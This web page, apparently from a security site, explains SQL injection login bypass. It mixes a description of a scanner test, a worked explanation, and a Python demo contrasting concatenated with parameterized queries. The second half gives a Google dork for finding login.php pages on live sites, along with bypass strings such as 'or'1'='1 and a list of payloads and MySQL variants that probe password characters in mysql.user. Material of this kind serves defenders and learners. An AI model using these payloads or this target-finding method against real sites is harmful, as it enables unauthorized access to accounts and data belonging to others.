
This SmartAttack tests a web application's login mechanism. By sequentially injecting several SQL strings into the username, password and other user-entered login fields, the SmartAttack attempts to bypass the login process. Care is taken not to lock out the user account while the SmartAttack tests variants of strings in the password field.

Successful bypass is determined by comparing the response with a page that represents a successful login and one that represents a failure. When the injected response page matches the successful login page, the existence of a vulnerability is reported. When the page matches neither the successful login page nor the failed login page, a warning is displayed, indicating a potential vulnerability.

theblackthreat
In general, web applications construct SQL statements by mixing SQL syntax written by the programmers with user-supplied data. Example:
=>select title, text from news where id=$id

Because of the way it is constructed, a user can supply crafted input that makes the original SQL statement perform further actions of the user's choice. The example below shows the user-supplied data "10 or 1=1" changing the logic of the SQL statement by adding the condition "or 1=1" to the WHERE clause.


=>select title, text from news where id=10 or 1=1

Standard SQL Injection Testing


Consider the following SQL query:

SELECT * FROM Users WHERE Username='$username' AND Password='$password'


A similar query is generally used by the web application to authenticate a user. If the query returns a row, a user with that set of credentials exists in the database and the user is allowed to log in to the system; otherwise access is denied. The values of the input fields are generally obtained from the user through a web form. Suppose we insert the following Username and Password values:


$username = 1' or '1' = '1

$password = 1' or '1' = '1


The query will be:

SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'
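The following added example (not code from the original page) runs the query above against a constructed in-memory SQLite table, once built by string concatenation and once with bound parameters, to show why the `1' or '1' = '1` input succeeds against the first form and fails against the second. The table contents and the helper names are assumptions made for the demonstration.

```python
import sqlite3

PAYLOAD = "1' or '1' = '1"  # the Username/Password value from the text above


def make_db():
    # Constructed sample Users table standing in for the application's database.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('admin', 's3cret')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    # Builds the statement by concatenation, exactly as $username and
    # $password are spliced into the query in the text. The quotes inside the
    # payload close the literal and the OR '1'='1' makes the WHERE clause true.
    sql = ("SELECT * FROM Users WHERE Username='" + username +
           "' AND Password='" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, username, password):
    # Same query with placeholders: the driver passes the values separately
    # from the statement text, so they are compared as plain strings and
    # cannot change the structure of the WHERE clause.
    sql = "SELECT * FROM Users WHERE Username=? AND Password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def demo():
    conn = make_db()
    return {
        "valid_vulnerable": login_vulnerable(conn, "admin", "s3cret"),
        "valid_parameterized": login_parameterized(conn, "admin", "s3cret"),
        "payload_vulnerable": login_vulnerable(conn, PAYLOAD, PAYLOAD),
        "payload_parameterized": login_parameterized(conn, PAYLOAD, PAYLOAD),
    }


if __name__ == "__main__":
    for name, logged_in in demo().items():
        print(name, logged_in)
```

Both functions accept the real credentials; only the concatenated version also accepts the payload, which is what the SmartAttack's page comparison is designed to detect.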

Report: SQL injection bypass

First, I opened the site with the help of a Google dork:

$Inurl:login.php site:[specify your site location]

Then I opened the sites and entered the username and login:

$username:'or'1'='1
$password:'or'1'='1
username and password >> admin'||' '==='

Here are some bypass queries you can use to bypass the login pages.

# Wide variety of logical requests.

and 1
or 1
and 1=1
and 2<3
and 'a'='a'
and 'a'<>'b'
and char(32)=' '
and 3<=2
and 5<=>4
and 5<=>5
and 5 is null
or 5 is not null
....
# An example of various request notations with the same meaning.
select user from mysql.user where user = 'user' OR mid(password,1,1)='*'
select user from mysql.user where user = 'user' OR mid(password,1,1)=0x2a
select user from mysql.user where user = 'user' OR mid(password,1,1)=unhex('2a')
select user from mysql.user where user = 'user' OR mid(password,1,1) regexp '[*]'
select user from mysql.user where user = 'user' OR mid(password,1,1) like '*'
select user from mysql.user where user = 'user' OR mid(password,1,1) rlike '[*]'
select user from mysql.user where user = 'user' OR ord(mid(password,1,1))=42
select user from mysql.user where user = 'user' OR ascii(mid(password,1,1))=42
select user from mysql.user where user = 'user' OR find_in_set('2a',hex(mid(password,1,1)))=1
select user from mysql.user where user = 'user' OR position(0x2a in password)=1
select user from mysql.user where user = 'user' OR locate(0x2a,password)=1
©2022 www.theblackthreat.in All right reserved.